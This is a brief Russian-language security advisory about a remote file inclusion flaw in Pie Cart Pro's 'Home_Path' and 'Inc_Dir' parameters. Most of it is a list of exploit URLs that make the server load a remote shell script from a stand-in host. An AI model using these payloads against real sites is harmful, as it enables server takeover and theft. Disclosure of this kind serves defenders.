Программа: Pie Cart Pro
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "Home_Path" в
сценарии content.php и параметра "Inc_Dir" во
многих сценариях. Удаленный пользователь
может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера.
Пример:
http://sitename.com/enc/content.php?Home_Path=http://SHELLURL.COM?
http://site.com/[path]/affiliates.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/orders.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/events.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/index.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/articles.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/faqs.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/guestbook.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/catalog.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/wholesale.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/weblinks.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/certificates.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/sitesearch.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/contact.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/sitemap.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/search.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/registry.php?Inc_Dir=http://shell.com/shell.txt?
http://site.com/[path]/error.php?Inc_Dir=http://shell.com/shell.txt?
